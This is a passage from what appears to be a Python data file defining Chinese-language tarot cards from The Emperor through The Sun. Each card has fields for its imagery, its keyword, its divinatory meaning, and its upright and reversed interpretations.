upright='温柔顺从的、高贵美丽的、享受生活的、丰收的、生产的、温柔多情的、维护爱情的、充满女性魅力的、具有母爱的、有创造力的女性、沈浸爱情的、财运充裕的、快乐愉悦的。', reversed='骄傲放纵的、过度享乐的、浪费的、充满嫉妒心的、母性的独裁、占有欲、败家的女人、挥霍无度的、骄纵的、纵欲的、为爱颓废的、不正当的爱情、不伦之恋、美丽的诱惑。' ), init=False) the_emperor: TarotCard = field(default=TarotCard( id=4, index='the_emperor', type='major_arcana', orig_name='The Emperor (IV)', name='皇帝', intro='一国之尊的皇帝头戴皇冠,身着红袍,脚穿象征严格纪律的盔甲,左手拿着一颗球,右手持的是象征生命的古埃及十字架,自信满满的坐在王位上。\n\n王位上有四个牡羊头作为装饰,如图所示,皇帝牌正是代表牡羊座的牌。牡羊座是十二星座的头一个,具有勇敢、积极、有野心、有自信的特质。红袍加上橙色的背景,呈现红色的主色调,与牡羊座的特性不谋而合。背景严峻的山象征前方险峻的路途。我们可以比较皇帝与皇后的背景,一个是严峻山川,一个是丰饶大地,形成互补的局面。', words='支配', desc='皇帝表示一种训练和实际致力于生活。\n\n皇帝意味透过自律和实际的努力而达到成功。它可以代表你生活中一段相当稳定,且井然有序的时光。这张牌可以暗示遭遇到法律上的问题,或是碰到某个地位、权利都在你之上的人,例如法官、警员、父亲,或具有父亲形象的人。\n\n为了成功,现在正是你采取务实态度来面对人生的时候。你被周遭的人设下种种限制,但只要你能在这些限制之内努力的话,你还是可以达成你的目标。', upright='事业成功、物质丰厚、掌控爱情运的、有手段的、有方法的、阳刚的、独立自主的、有男性魅力的、大男人主义的、有处理事情的能力、有点独断的、想要实现野心与梦想的。', reversed='失败的、过于刚硬的、不利爱情运的、自以为是的、权威过度的、力量减弱的、丧失理智的、错误的判断、没有能力的、过于在乎世俗的、权力欲望过重的、权力使人腐败的、徒劳无功的。' ), init=False) the_hierophant: TarotCard = field(default=TarotCard( id=5, index='the_hierophant', type='major_arcana', orig_name='The Hierophant (V)', name='教皇', intro='教皇身穿大红袍子,端坐在信众前。他头戴象征权力的三层皇冠,分别代表身心灵三种层次的世界。\n\n他的右手食中指指向天,象征祝福﹔左手持着主字形的权杖,象征神圣与权力。他耳朵旁边垂挂的白色小物,代表内心的声音。教皇前方放着两把交叉的钥匙,在很多版本的塔罗牌里,钥匙是金色银色各一把,象征阳与阴,日与月,外在与内在,我们的课题就是要学会如何结合两者,而钥匙本身可用以开启智慧与神秘之门。教皇前方的两位信众,左边的身穿象征热情的红玫瑰花纹衣裳,右边则穿象征性灵成长的白百合衣裳(红玫瑰与白百合在魔术师也曾出现过)。教皇与信众三人的衣服都有牛轭形(Y字形)装饰,牛轭的用途是促使受过训练的动物去工作的,出现在教皇牌的道理值得深思。教皇后方则是曾经在女祭司中出现的两根柱子,不过在这里它们是灰色的,灰色象征由经验而来的智慧﹔另一说则是教皇后方虽无女祭司的帷幕将潜意识隔离,但暗沉的灰色代表通往潜意识之路仍未开启。柱子上的图案象征肉体结合。', words='援助', desc='教皇代表需要为你的心灵成长,及人生方向付起责任。\n\n教皇暗示你向某人或某个团体的人屈服了。或许这正是你为自己,及心灵上的需求负起责任的时刻了。你目前的行事作风并非应付事情的唯一方式,假设你愿意加以探索的话,或许你就会找到新的可能。', upright='有智慧的、擅沟通的、适时的帮助、找到真理、有精神上的援助、得到贵人帮助、一个有影响力的导师、找到正确的方向、学业出现援助、爱情上出现长辈的干涉、媒人的帮助。', reversed='过于依赖的、错误的指导、盲目的安慰、无效的帮助、独裁的、疲劳轰炸的、精神洗脑的、以不正当手段取得认同的、毫无能力的、爱情遭破坏、第三者的介入。' ), init=False) the_lovers: TarotCard = field(default=TarotCard( id=6, index='the_lovers', type='major_arcana', orig_name='The Lovers (VI)', name='恋人', intro='恋人牌背景在伊甸园,亚当与夏娃分站两边,两者皆裸身,代表他们没什么需要隐藏的。两人所踩的土地相当肥沃,生机盎然。\n\n夏娃的背后是知识之树,生有五颗苹果,象征五种感官,有条蛇缠绕树上。蛇在世界文化中的象征丰富多元,此处可能象征智慧,也象征欲望与诱惑。牠由下往上缠绕在树上,暗示诱惑经常来自潜意识。亚当背后是生命之树,树上有十二团火焰,象征十二星座,也象征欲望之火。伟特说:“亚当与夏娃年轻诱人的躯体,象征未受有形物质污染之前的青春、童贞、纯真和爱”。两人背后的人物是风之天使拉斐尔(Raphael),风代表沟通,祂身穿的紫袍则是忠贞的象征,显示这个沟通的重要性。亚当看着夏娃,夏娃则望着天使,象征“意识─潜意识─超意识”与“身─心─灵”或是“理性─感性”之间的传导。天使之下,亚当夏娃中间有一座山,象征意义解读众多,主要有三种:一说是山代表阳性,水代表阴性,两者表现阴阳平衡,意味我们必须把阴与阳、理性与感性的能量调和。一说认为这座山象征正当思想的丰饶果实。另一说则认为它代表高峰经验与极乐。', words='结合', desc='恋人牌意味,为了爱的关系而做的某些决定。\n\n恋人是一张代表决定的牌,而且除非问的是某个特定的问题,否则它通常是指有关两性关系的决定。它可能是在描述沉浸在爱恋之中的过程,因为它可以意指一段两性关系中的最初,或者是罗曼蒂克的阶级。恋人牌也可以形容在决定到底要保留就有的关系,或转进新关系当中。它暗示你已经由过去经验而得到成长了,因此你可以安全的迈向一个新的阶段。', upright='爱情甜蜜的、被祝福的关系、刚萌芽的爱情、顺利交往的、美满的结合、面临工作学业的选择、面对爱情的抉择、下决定的时刻、合作顺利的。', reversed='遭遇分离、有第三者介入、感情不合、外力干涉、面临分手状况、爱情已远去、无法结合的、遭受破坏的关系、爱错了人、不被祝福的恋情、因一时的寂寞而结合。' ), init=False) the_chariot: TarotCard = field(default=TarotCard( id=7, index='the_chariot', type='major_arcana', orig_name='The Chariot (VII)', name='战车', intro='一位英勇的战士驾着一座由两只人面狮身兽拉着的战车。人面狮身兽一只是黑的,代表严厉,另一只是白的,代表慈悲。两兽同时来看,也是阴阳平衡的象征。\n\n战车上有四根柱子(四个代表上帝的希伯来字母YHWH或火水风土四要素)支撑着蓝色车棚,车棚上饰以六角星花纹,象征天体对战士成功的影响。英勇的战士手持象征意志与力量的矛形权杖,头戴象征统治的八角星头冠和象征胜利的桂冠,身穿盔甲。盔甲上的肩章呈现弦月形,显示战车牌与属月亮的巨蟹座之关联。斜挂的腰带上有占星学符号,裙上有各种炼金术的符号。胸前的四方形图案代表土要素,象征意志的力量。战车前方的翅膀图案是古埃及的图腾,代表灵感。翅膀下面是一个小盾牌,其上的红色的图案是一种印度图腾,为男性与女性生殖器结合的象征,也是二元性与一元性,类似中国的阴与阳,可能暗示编号七的战车牌走过愚人之旅的三分之一,已达性成熟的阶段。战士身后的河流就是圣经创世纪中四条伊甸园之河其中的一条,与皇后、皇帝和、死神牌中的河是同一条。再后面就是一座高墙耸立的城市。战士背对城市,暗示他把物质置于身后,向前开展心灵上的旅程。他手上没有缰绳,表示他不是用肉体来控制那两头朝不同方向行进的人面狮身兽,而完全凭借他旺盛过人的意志力。值得注意的一点是他站在城墙外守御,而非进攻,所以这位战士是位守护者、防御者,而不是侵略者。他是尽他的本分,并努力做到最好。', words='胜利', desc='战车牌意味训练有素的心智。\n\n战车可以代表一部车,或是坐车旅行。当这张牌出现时,它可能意味着你需要控制生命中互相对抗的力量。目前的情况可能会出现某些矛盾,而你正以理智在控制着它们。\n\n这是一张代表由于坚持而取得成功的牌。如果用来形容一个人的话,战车是暗示这个人(通常是指男人),掌控着她自己和周遭的事物。正立的战车也可能意指一桩重要的生意,或意义重大的成功。', upright='胜利的、凯旋而归的、不断的征服、有收获的、快速的解决、交通顺利的、充满信心的、不顾危险的、方向确定的、坚持向前的、冲劲十足的。', reversed='不易驾驭的、严重失败、交通意外、遭遇挫折的、遇到障碍的、挣扎的、意外冲击的、失去方向的、丧失理智的、鲁莽冲撞的。' ), init=False) strength: TarotCard = field(default=TarotCard( id=8, index='strength', type='major_arcana', orig_name='Strength (VIII)', name='力量', intro='代表力量的女人轻柔地合上狮子的嘴。女人头上有魔术师牌中出现的倒8符号,象征她的力量是无穷尽的。她头上戴着花环,腰间也系着花环,而且腰间花环还连系在狮子颈间,形成第二个倒8符号。狮子身体微倾,尾巴轻垂,表现出彻底的顺服,还伸出舌头来舔着女人的手。', words='意志', desc='力量牌暗示你拥有足够的内在力量去面对人生。\n\n这张力量牌意味你有能力面对生活和困难的环境,或者有能力以希望、内在力量及勇气去做改变。勇气并不代表你没有恐惧,而是虽然你有恐惧,你还是愿意对某人或某事有所承诺。\n\n这张牌象征你拥有内在的力量来面对你内在的恐惧和欲望,而非让它们屈服于你的意志。在健康的分析方面,这张牌可能是有关心脏或脊椎方面的毛病,不过这些毛病也可以透过内在能量来克服,而且这张牌也暗示你本身拥有这种能量。', upright='内在的力量使成功的、正确的信心、坦然的态度、以柔克刚的力量、有魅力的、精神力旺盛、有领导能力的、理性的处理态度、头脑清晰的。', reversed='丧失信心的、失去生命力的、沮丧的、失败的、失去魅力的、无助的、情绪化的、任性而为的、退缩的、没有能力处理问题的、充满负面情绪的。' ), init=False) the_hermit: TarotCard = field(default=TarotCard( id=9, index='the_hermit', type='major_arcana', orig_name='The Hermit (IX)', name='隐者', intro='身穿灰色斗篷和帽子的老人站在冰天雪地的山巅上,低头沉思,四周渺无人烟。他右手高高举着一盏灯,这是真理之灯,灯里是颗发亮的六角星,名称是所罗门的封印,散发出潜意识之光。老人左手拄着一根族长之杖,这跟杖在愚人、魔术师、战车都曾经出现过。愚人太过天真,不知杖的魔力,拿它来系包袱;魔术师用代表意识的右手运用杖的法力;战车把杖化为矛,也用右手紧握着;隐士则杖交左手,用以在启蒙之路上做前导。', words='探索', desc='隐士牌暗示着:省思的一段时间。\n\n隐士牌暗示一段反省的时间。它代表着一段想要让你的过去、现在,以及未来成为有意义的时间。这张牌代表去看咨商辅导员、持续一段梦想之旅,或为了开发你自己的沉思。它也代表成熟,以及你已经知道生命中真正重要的是什么。\n\n它可能意味着得到身体或心灵上的协助及智因;或是你帮助其他人发现人生理解及事件的导因。它也代表一段时间内,你会问自己如下的问题:我从何处来?我现在位于何处?又将往何处去?', upright='有骨气的、清高的、有智慧的、有法力的、自我修养的,生命的智慧情境、用智慧排除困难的、给予正确的指导方向、有鉴赏力的、三思而后行的、谨慎行动的。', reversed='假清高的、假道德的、没骨气、没有能力的、内心孤独寂寞的、缺乏支持的、错误的判断、被排挤的、没有足够智慧的、退缩的、自以为是的、与环境不合的。' ), init=False) wheel_of_fortune: TarotCard = field(default=TarotCard( id=10, index='wheel_of_fortune', type='major_arcana', orig_name='Wheel of Fortune (X)', name='命运之轮', intro='所有的大牌都有人物,命运之轮是唯一的例外,可见这张牌独树一格。深蓝色的天空悬着一个轮子,轮盘由三个圆圈构成(教宗的头冠也是),最里面的小圈代表创造力,中间是形成力,最外层是物质世界。小圈里头没有任何符号,因为创造力潜能无限;中间圆圈里有四个符号,从上方顺时针依序是炼金术中的汞风、硫、水,分别与风火水土四要素相关联,是形成物质世界的基本要素﹔最外层就是物质世界,上右下左四方位分别是TARO四个字母,这四个字母可以组成Rota(轮)、Orat(说)、Tora(律法)、Ator(哈扥尔女神),形成一个完整的句子“塔罗之轮述说哈扥尔女神的律法”,其余四个符号是希伯来字母YHVH,是上帝最古老的名字。轮盘从中心放射出八道直线,代表宇宙辐射能量。\n\n在轮盘左方有一条往下行进的蛇,是埃及神话中的邪恶之神Typhon,牠的向下沉沦带着轮子进入分崩离析的黑暗世界。相反的,背负轮盘的胡狼头动物渴求上升,牠是埃及神话中的阿努比神(Anubis)。而上方的人面狮身兽是智慧的象征,均衡持中,在变动中保持不变。牠拿着的宝剑代表风要素,表示心智慧力、思考力和智慧。\n\n四个角落的四只动物,从右上方顺时针看分别是老鹰、狮子、牛、人,而且他们都有翅膀。这四个动物出自圣经启示录第四章“宝座周围有四个活物,前后遍体都满了眼睛。第一个活物像狮子,第二个像牛犊,第三个脸面像人,第四个像飞鹰”,耶路撒冷圣经提到四活物象征四位福音书的作者(马太、马可、路加和约翰)。在占卜上这四个动物与占星学产生关联,分别代表四个固定星座和四要素,老鹰是天蝎座(水),狮子是狮子座(火),牛是金牛座(土),人是水瓶座(风)。牠们都在看书,汲取智慧,而翅膀赋予牠们在变动中保持稳定的能力。', words='轮回', desc='命运之轮意味着你境遇的改变。观察这个改变,并留意它的模式。\n\n生命是变化无常的,当牌面上的命运之轮是正立时,改变似乎是有利的;而当它倒立时,改变又似乎是有害的。它只是改变,而似乎有害的改变,事实上可能会是一种祝福。你必须超越现状,将眼光放远,来观察生命的消长。\n\n通常命运之轮象征你生命境遇的改变。或许你并不了解这些改变的原因,不过在这里,你如何因应改变是比较重要的。你要迎接生命所提供给你的机会,还是要抗拒改变呢?此牌正立时就是在告诉你,要去适应这些改变。', upright='忽然而来的幸运、即将转变的局势、顺应局势带来成功、把握命运给予的机会、意外的发展、不可预测的未来、突如其来的爱情运变动。', reversed='突如其来的厄运、无法抵抗局势的变化、事情的发展失去了掌控、错失良机、无法掌握命运的关键时刻而导致失败、不利的突发状况、没有答案、被人摆布、有人暗中操作。' ), init=False) justice: TarotCard = field(default=TarotCard( id=11, index='justice', type='major_arcana', orig_name='Justice (XI)', name='正义', intro='一个女人端坐在石凳上,右手持剑高高举起,左手在下拿着天秤。身穿红袍,头戴金冠,绿色披肩用一个方形扣子扣起。她的右脚微微往外踏出,似乎想站起来,而左脚仍隐藏在袍子里面。她高举宝剑,象征她的决心。宝剑不偏不倚,象征公正,且智慧可以戳破任何虚伪与幻象。宝剑两面都有刃,可行善可行恶,端看个人选择。左手的金色天秤和披肩的绿色都是天秤座的象征。手持天秤表示她正在评估,正要下某个决定,同时追求平衡。胸前的方形扣子中间是个圆形,象征四要素的调和。头上的金冠中心有个四方形宝石,加上金冠的三个方顶,加起来得到数字七,代表金星,也就是天秤座的守护星。后方是个紫色帷幕,象征隐藏的智慧。两边柱子象征正面和负面的力量。', words='均衡', desc='正义意味,这是一段你为你的人生决定负起责任的时光。\n\n正义意味事情已经达成它应有的使命。也就是说,你过往的决定或行为已经引导你走到了目前的境遇。你已经得到你应得的了,如果你对自己是够诚实的话,你肯定知道这点。它代表你应该对自己,以及周遭的人绝对的诚实。你应该自己,以及使你成为今天这个样子的种种决定负起责任。你的未来可能会因为你目前的决定、行为或理解而改变。', upright='明智的决定、看清了真相、正确的判断与选择、得到公平的待遇、走向正确的道路、理智与正义战胜一切、维持平衡的、诉讼得到正义与公平、重新调整使之平衡、不留情面的。', reversed='错误的决定、不公平的待遇、没有原则的、缺乏理想的、失去方向的、不合理的、存有偏见的、冥顽不灵的、小心眼、过于冷漠的、不懂感情的。' ), init=False) the_hanged_man: TarotCard = field(default=TarotCard( id=12, index='the_hanged_man', type='major_arcana', orig_name='The Hanged Man (XII)', name='倒吊人', intro='倒吊人图案简单,涵义却深远。我们看到一个男人在一棵T字形树上倒吊着。他两手背在背后,形成一个三角形。两腿交叉形成十字。十字和三角形结合在一起,就是一个炼金符号,象征伟大志业的完成,也象征低层次的欲望转化到高层次的灵魂(炼成黄金)。\n\n红裤子象征身心灵中的“身”,也就是人类的欲望和肉体。蓝上衣即身心灵中的“心”,象征知识。他的金发和光环象征智慧和心灵的进化,也就是“灵”。金色的鞋子则象征倒吊人崇高的理想。在某些版本的塔罗牌中,倒吊人就是神话中的奥丁(Odin),他身后的树就是北欧神话中的义格卓席尔巨树(Yggdrasil),也称作世界之树,由地狱(潜意识)开始生长,经过地面(意识),直达天庭(超意识)。还记得皇帝右手拿着一根象征生命的古埃及十字架吗?古埃及十字架代表希伯来的第十九个字母Tau,是属于世间的一个字母,而倒吊人倒吊的T字树,正是它的下半部,表示倒吊人仍然是入世的。', words='牺牲', desc='“以将有更美好的事物降临于你身上的信念,顺从于人生”是倒吊人这张牌所传达的讯息。\n\n倒吊人是一张代表投降的牌。它暗示,当你在这段期间内,透过对生命的顺从,并让它引领你到你需要去的地方,那么你便可以获益良多。\n\n倒吊人还是一张代表独立的牌。这段期间内,你应该顺着感觉走,或是接受自己,即使别人都认为你的方式很奇怪也不打紧。它也可能象征,经历了生命中一段艰难的时光后的心灵平静。\n\n现在不是挣扎的时候,静下来好好思考你过去的行为,以及未来的计划。这只是一个暂时的状态,只要你妥善的运用这段时间,对你应该是有好处的。让生命中的事物自然而然的发生,或许你会对结果感到惊喜。带着“会有更美好的事情临降,来取代你所捐弃的事物”的信念,顺从于人生。花点时间来观察潜伏于事件底下的生命潮流。生命会给你一段宁静的时光,远离世界的纷纷扰扰,所以善用这段时光将是明智之举。', upright='心甘情愿的牺牲奉献、以修练的方式来求道、不按常理的、反其道而行的、金钱上的损失、正专注于某个理想的、有坚定信仰的、长时间沈思的、需要沈淀的、成功之前的必经之道。', reversed='精神上的虐待、心不甘情不愿的牺牲、损失惨重的、受到亏待的、严重漏财的、不满足的、冷淡的、自私自利的、要求回报的付出、逃离綑绑和束缚、以错误的方式看世界。' ), init=False) death: TarotCard = field(default=TarotCard( id=13, index='death', type='major_arcana', orig_name='Death (XIII)', name='死神', intro='传统的死神牌,通常是由骷髅人拿着镰刀来代表,而伟特将死神的意象提升到更深一层的境界。\n\n最显眼的就是那位骑着白马的骷髅骑士。他身边有四个人,国王、主教、女人、小孩,象征无论是世俗或出世、男或女、老或少,都逃不过死亡这个自然现象。国王抗拒死亡,被骷髅骑士践踏过去﹔主教的权杖掉在地上,双手合十崇敬死亡﹔女人跪下,别过脸不忍看﹔小孩不懂死亡,好奇的望着骷髅骑士。其中主教可能就是编号五的教宗牌,他掉落在地上的权杖象征世俗权力遇到死亡时毫无用处,仔细一看权杖顶似乎有三层圆圈,和教宗牌戴在头上的权冠相同,而主教头上戴的帽子状似尖尖的鱼头,代表双鱼世纪的结束,也可能暗示死神牌关联的希伯来文Nun,意思是鱼。跪着的女人可能是力量牌中的那位女性,她们的衣着与头冠都极为相似。再回到骷髅骑士,他头上那根红羽毛和愚人所戴的是同一根,他的旗帜是黑色背景,象征光芒的不存,上面五瓣蔷薇的图案是蔷薇十字会的图腾,关于此图腾的说法众多,可能是代表随着死亡而来的新生,另一说是象征火星与生命力,还有一说是象征美丽纯洁与不朽。远方的河流就是流经伊甸园的四条河流之一,称为冥河(Styx),象征川流不息的生命循环。河上有艘船,船的上方有个类似洞穴的地方,右方有个箭头(在死神的脚跟处)指向洞穴,这个洞穴可能是“神曲”一书中但丁前往阴间的通道,而牌中右方一条小径通往两座塔中(月亮和节制都有相同背景,这两座塔也可能是女祭司背后的柱子),代表通往新耶路撒冷的神秘旅程。象征永生的朝阳在两座塔间升起,似乎在告诉我们死亡并不是一切的终点。', words='结束', desc='死亡牌意味某种状况的结束。\n\n死亡为旧事物画上休止符,并让路给新事物。死亡牌代表改变的一段其间。我们可以这样说,生命中的某个章节就要结束了,而你对这份改变的接纳,将是变化自然而然地发生。\n\n抱持着“生命将会带来某些比它从你身上拿走的更美好的东西”的信念。在潜意识中,你或许也在渴望改变的发生,死亡牌即意味着改变正要出现。不要抗拒这份改变,试着去接纳它吧。', upright='必须结束旧有的现状、面临重新开始的时刻到了、将不好的过去清除掉、专注于心的开始、挥别过去的历史、展开心的旅程、在心里做个了结、激烈的变化。', reversed='已经历经了重生阶段了、革命已经完成、挥别了过去、失去了、结束了、失败了、病了、走出阴霾的时刻到了、没有转圜余地了。' ), init=False) temperance: TarotCard = field(default=TarotCard( id=14, index='temperance', type='major_arcana', orig_name='Temperance (XIV)', name='节制', intro='十四号的节制牌,出现在死神牌之后。大天使麦可手持两个金杯,把左手杯中的水倒入右手杯中。\n\n金发的天使身着白袍,背长红翅膀,胸前有个方形图案(地元素),中间是个橘色的三角形(火元素),同样的图案在正义牌中也可看到。天使头上则戴个饼图案,中间有一个小点,是炼金术中代表黄金的符号,也就是终极目标。天使脸上闪耀着和谐的光辉,怡然自在,他/她的右脚踏入象征潜意识的池塘中,左脚站在象征显意识的岸边石头上,代表两者之间的融合。塘边生长一丛爱丽斯花。远方有一条小径通往淡蓝色的两座山间,双山顶间闪耀着王冠般的金色光芒,类似如此的图像也曾出现于前一张死神牌中的小径、双塔与朝阳。恋人与审判牌中也有天使的出现。另外,大天使对应希腊神话中的彩虹之神,暴风雨后的彩虹,意味着节制牌已经从死神带给我们的恐惧中超脱出来了。整张牌带给人宁静祥和的感受,让人们明白死亡之后终获新生。', words='净化', desc='节制代表行动及感情的融合,带来内心的平静感觉。\n\n节制是一张代表行为,而非观念的牌。它代表对某种特定状况的适当行为。显示一种因为行为及情绪的结合,而带来内在平静的感觉。节制意味着结合自发性及知识的能力,运用精神的知识及理解力来调节行为的能力。它是指知道每种状况来临时,应该采取什么适当的反映或行为。\n\n节制牌暗示你较高层次的自我,和较低层次的自我可以和谐共存。你带着一种方向感行动,不管那是精神上或实质上的行动。它代表尽力而为,以达到你可以达到的境界。', upright='良好的疏导、希望与承诺、得到调和、有节制的、平衡的、沟通良好的、健康的、成熟与均衡的个性、以机智处理问题、从过去的错误中学习、避免重蹈覆辙、净化的、有技巧的、有艺术才能的。', reversed='缺乏能力的、技术不佳的、不懂事的、需反省的、失去平衡状态、沟通不良的、缺乏自我控制力、不确定的、重复犯错的、挫败的、受阻碍的、暂时的分离、希望与承诺遥遥无期。' ), init=False) the_devil: TarotCard = field(default=TarotCard( id=15, index='the_devil', type='major_arcana', orig_name='The Devil (XV)', name='恶魔', intro='在恶魔牌上,我们看到和恋人相似的构图,只是恋人牌的天使在这里换成了恶魔,而亚当夏娃已然沉沦,上天的祝福变成了诅咒。\n\n牌中的恶魔有蝙蝠翅膀、羊角、羊腿和鸟足,象征动物的本能与天性。牠的驴耳则代表固执。恶魔头上的倒立星币,顶端指向地面,代表物质世界。恶魔右手向上摆出黑魔法的手势,与教宗的祝福手势形成对比。手心的符号代表土星,限制与惰性之星,也是魔羯座的守护星。恶魔左手则持着火炬,同样向下导引到物质世界,似乎在煽动亚当的欲望。注意恶魔坐的地方并不是三度空间的立方体,而是二度空间的长方形,象征人们只看见感官所见的现实,却非全部的真实,好比瞎子摸象。前方的亚当夏娃同样长出角和尾巴,显露出野兽本能。亚当的尾巴尖端是朵火焰,夏娃则是葡萄,都是恋人牌树上结的果实,表示她们误用了天赋。两个人被铁链锁住,乍看无处可逃,但仔细一看,其实系在她们脖子上的链子非常的松,只要愿意,随时可以挣脱,但她们却没有,表示这个枷锁是他们自己套在自己身上的。恶魔牌背景全黑,光芒不存,代表精神上的黑暗。', words='诱惑', desc='魔鬼牌代表错以为别无选择。\n\n魔鬼牌代表一种错误的概念,认为事情别无选择。觉得“我所拥有的就是这些”或“这是我唯一的选择”。在宗教的前因后果当中,魔鬼引诱男人使它遗忘掉精神的探索,以及他的神圣目的。在一般性的占卜中,魔鬼代表一种控制生命的需求,你对与自己的可能性缺乏完整的关照。\n\n魔鬼牌描述的是一种对生命物质化的观点,或像王尔德(OscarWilde)所说的:“知道所有东西的价格,却不知道任何东西的价值。”它可能暗示在某种状况内受到限制,却不愿意去改变。它是一种“偷鸡摸狗胜过杀人放火”的态度。', upright='不伦之恋、不正当的欲望、受诱惑的、违反世俗约定的、不道德的、有特殊的艺术才能、沉浸在消极里、沉溺在恐惧之中的、充满愤怒和怨恨、因恐惧而阻碍了自己、错误的方向、不忠诚的、秘密恋情。', reversed='解脱了不伦之恋、挣脱了世俗的枷锁、不顾道德的、逃避的、伤害自己的、欲望的化解、被诅咒的、欲望强大的、不利的环境、盲目做判断、被唾弃的。' ), init=False) the_tower: TarotCard = field(default=TarotCard( id=16, index='the_tower', type='major_arcana', orig_name='The Tower (XVI)', name='塔', intro='一座位于山巅上的高塔,被雷击中而毁坏,塔中两人头上脚下的坠落。塔顶有个王冠受雷殛而即将坠落。塔象征物质,王冠象征统治和成就,也代表物质与财富,受雷一殛,便荡然无存。天上的落雷是直接来自上帝的语言,两旁的火花有二十二个,象征塔罗二十二张大牌。灰色的云降下灾难之雨,不分性别阶级,平等的落向每一个人。背景全黑,这是一段黑暗的时期。', words='毁灭', desc='高塔象征生命中无可避免的改变。\n\n这种改变是是从根基到顶端的完全崩解与毁灭,是一种无可挽救的崩溃。这种改变是突然而来的,有时候激烈无比,这是一种易于顺从而难以抗拒的改变。当高塔牌出现时,便是到了改变的时刻。现在再来为改变做准备,或选择如何改变都已太迟,现在你需要做的就是丢掉旧东西。', upright='双方关系破裂、难以挽救的局面、组织瓦解了、损失惨重的、惨烈的破坏、毁灭性的事件、混乱的影响力、意外的发展、震惊扰人的问题、悲伤的、离别的、失望的、需要协助的、生活需要重建的。', reversed='全盘覆没、一切都已破坏殆尽、毫无转圜余地的、失去了、不安的、暴力的、已经遭逢厄运了、急需重建的。' ), init=False) the_star: TarotCard = field(default=TarotCard( id=17, index='the_star', type='major_arcana', orig_name='The Star (XVII)', name='星星', intro='一位赤裸的金发女子,左膝跪在象征显意识的地面上,右脚踏在象征潜意识的池水里。她左右手各持一个水壶,壶中装的是生命之水,她右手壶的水倾倒入池,激起阵阵涟漪,左手壶的水则倒在青翠的草地上,分成象征人类五种感官的五道水流,其中一道又流回池塘,再度充实潜意识之泉。她身后有棵树,树上有只象征智慧的朱鹭,同时也代表埃及神话中的托特之神,是所有艺术的创造者。女子的后方则是一大片广阔开满花的草原,和一座山脉,天空一颗巨大的金色八角星,七颗白色的小八角星则环绕在四周。', words='希望', desc='星星牌意味创造力和对生命的可能性的信心。\n\n星星是一张代表重新点燃希望的牌。它代表相信明天会更好的内在信心。你可以直接体验潜意识,而不是它的种种符号或意象。你可以体验这种强而有力的能量,并将它导入你的生命中。例如,艺术家利用这种能量来工作,以创作某些足以触动观赏者心情和灵魂的作品。它是一张代表信心、希望和内在平静的牌。', upright='未来充满希望的、新的诞生、无限的希望、情感面精神面的希望、达成目标的、健康纯洁的、美好的未来、好运即将到来、美丽的身心、光明的时机、平静的生活、和平的处境。', reversed='希望遥遥无期的、失去信心的、没有寄托的未来、失去目标的、感伤的、放弃希望的、好运远离的、毫无进展的、过于虚幻、假想的爱情运、偏执于理想、希望破灭的。' ), init=False) the_moon: TarotCard = field(default=TarotCard( id=18, index='the_moon', type='major_arcana', orig_name='The Moon (XVIII)', name='月亮', intro='相较于其它的牌,月亮整体呈现的图面经常令人感到诡异。近景是一只龙虾爬出池塘的景象,龙虾象征比恐惧和兽性更深的情绪,伟特说牠总是爬到一半又缩回去。中景处有频频吠叫的一只狗和一匹狼,分位于左右两边,分别象征人类内心中已驯化和未驯化的兽性。中间有一条通往两塔之间,延伸向远处山脉的小径上,这条小径是通往未知的出口,只有微弱的月光映照着。一轮月亮高挂空中,总共有三个层次,最右边的是新月,最左边的是满月,而中间的女人脸孔则是伟特所谓的“慈悲面”,从新月渐渐延伸向满月,越来越大。月亮的外围则有十六道大光芒,和十六道小光芒,其下有十五滴象征思想之露珠。', words='不安', desc='月亮象征倾听你的梦,以找到内心世界的平静。\n\n想象是相当强而有力的,它可以让内心很快的产生和平、和谐和欢乐;它也可以以同样快的速度产生痛苦、惊惧、悲伤和愤怒。月亮是一张代表梦和想象的牌。梦是转化为意象的潜意识能量。当这股能量强烈到无法被吸收或理解时,可能会导致狂野的梦、噩梦,甚至疯狂。月亮牌所代表的潜意识恐惧,必须由我们单独去面对。\n\n月亮代表强烈的梦想和经由梦传达到你意识思想中的直觉。强而有力的梦企图告诉你某些事情。倾听你的梦,你将会发现你所要找寻的答案。', upright='负面的情绪、不安和恐惧、充满恐惧感、阴森恐怖的感觉、黑暗的环境、景气低落、白日梦、忽略现实的、未知的危险、无法预料的威胁、胡思乱想的、不脚踏实地的、沉溺的、固执的。', reversed='度过低潮阶段、心情平复、黑暗即将过去、曙光乍现、景气复甦、挥别恐惧、从忧伤中甦醒、恢复理智的、看清现实的、摆脱欲望的、脚踏实地的、走出谎言欺骗。' ), init=False) the_sun: TarotCard = field(default=TarotCard( id=19, index='the_sun', type='major_arcana', orig_name='The Sun (XIX)', name='太阳', intro='可爱的裸体孩童骑在马背上,跨越灰色的围墙,脸上带着微笑。\n\n孩童头上戴着雏菊花环,以及一根红色的羽毛。这根羽毛就是在愚人与死神出现的同一根,象征太阳牌已经跨越了死亡的界限,而重获新生。围墙后面种满向日葵,里头是一座人造的花园,而孩童跃离了花园,代表他不需要这些人工的产物,他是最纯真、自然、不需隐藏的,如同他一丝不挂的身体。向日葵共有四朵,象征四要素昂与小阿尔克那的四个牌组。有趣的是,四朵向日葵是向着孩童,而不是太阳,表示这位快乐的孩童已经拥有足够的能量。马匹背上没有马鞍,孩童不用缰绳控制牠,甚至连双手也不用,显示马匹象征的能量已经受到充分控制。孩童左手持着红色旗帜,左手象征潜意识,红色旗帜象征行动,表示他已经不用像战车那样用象征意识的右手来掌控,他可以轻而易举、自然的控制一切。背景的太阳是生命的源头,万物赖以维生之源,总共有21道光芒,代表愚人以外的21张大阿尔克那,仔细一看在上方罗马数字的旁边有一道黑色的曲线光芒,代表愚人(另有一说是太阳中心圆形的部分是愚人)。这样的更改是为了避免原本的暧昧。', words='生命', desc='太阳象征欢乐、内在的平和,以及表达自我的需求。\n\n它也代表理解到幸福是一种选择。太阳代表一种令人愉悦的解脱。它表示觉醒的力量足以驱逐黑暗。它代表一种表达内在无意识和潜意识力量的天赋趋力。它是充满希望、理想主义,以天真率直的。\n\n太阳象征欢乐和内在平静,而且感觉宇宙是一个充满乐趣和创造性的地方。太阳是自由的充分显现。它从意识层心智的日常限制中彻底解放,转为一种开放、觉醒及自由状态。它是一种可以带来肉体自由的内心自由。太阳显示出欢乐、和平、幸福及有创意的生活态度,并且深深体会到生命之美。', upright='前景看好的、运势如日中天的、成功的未来、光明正大的恋情、热恋的、美满的婚姻、丰收的、事件进行顺畅的、物质上的快乐、有成就的、满足的生活、旺盛。', 